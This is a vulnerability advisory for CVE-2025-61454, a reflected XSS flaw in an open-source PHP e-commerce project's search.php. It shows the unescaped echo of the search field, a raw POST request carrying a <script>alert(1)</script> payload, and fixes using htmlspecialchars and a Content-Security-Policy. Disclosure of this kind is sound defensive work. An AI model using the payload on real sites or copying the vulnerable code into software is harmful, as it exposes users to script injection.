
Public disclosure and proof-of-concept for CVE-2025-61454, a reflected XSS vulnerability in E-commerce Project v1.0's search.php, including exploitation steps and remediation guidance.
Disclosure Date: 14 October 2025
CVE ID: CVE-2025-61454
Severity: MEDIUM (CVSS 6.1)
A reflected Cross-Site Scripting (XSS) vulnerability exists in the E-commerce Project v1.0, specifically within the search.php endpoint. Unsanitized input in the search parameter is directly reflected back into the response HTML, allowing attackers to execute arbitrary JavaScript in the browser of a user who visits a malicious link or submits a crafted request.
This issue has been assigned the identifier CVE-2025-61454. At the time of disclosure, no patch has been released by the vendor.
search.phphttp://localhost/e-commerce-main/search.phpThe server fails to properly sanitize the search parameter from POST data before reflecting it into the response HTML. This allows attackers to inject JavaScript payloads, leading to client-side code execution.
An attacker crafts input containing embedded script-like content and sends it to the vulnerable POST endpoint. Because the server reflects the input into the HTML response without applying proper HTML/attribute/JS encoding, the browser treats the reflected content as executable markup and runs it. This is a reflected (non-persistent) XSS scenario; the attacker must persuade a victim to perform the request or visit a specially constructed link/form.
$search = $_POST['search'];
echo "<div>Search results for: $search</div>";
| CWE ID | Title |
|---|---|
| CWE-79 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') |
| Score | Severity | Vector String |
|---|---|---|
| 6.1 | MEDIUM | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
A successful exploitation could result in:
git clone https://github.com/Bhabishya-123/E-commerce.git
Use XAMPP/LAMP to deploy the project and access the application.
POST /e-commerce-main/search.php HTTP/1.1
Host: localhost
Referer: https://localhost/e-commerce-main/
Content-Type: application/x-www-form-urlencoded
search=yxo9p%3cscript%3ealert(1)%3c%2fscript%3exnzmd&submit=
search=yxo9p<script>alert(1)</script>xnzmd&submit=
yxo9p<script>alert(1)</script>xnzmd
Explanation:
The payload <script>alert(1)</script> is embedded within the search parameter. When a victim submits a search form with this malicious payload (or is tricked into doing so via social engineering), the JavaScript executes in their browser context.
If vulnerable, the browser will execute the JavaScript code, displaying an alert box with the value 1. This confirms successful XSS exploitation.
htmlspecialchars() or equivalent to encode all untrusted output before rendering to HTML.$search = htmlspecialchars($_POST['search'], ENT_QUOTES, 'UTF-8');
echo "<div>Search results for: $search</div>";
Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'
| Event | Date |
|---|---|
| Vulnerability Discovered | 16 September 2025 |
| Public Disclosure | 13 October 2025 |
| Patch Available | ❌ Not available as of disclosure |
This vulnerability was discovered and disclosed by:
Tansique Dasari
🔗 GitHub
✉️ [email protected]
💬 This advisory is published independently due to absence of an official vendor patch.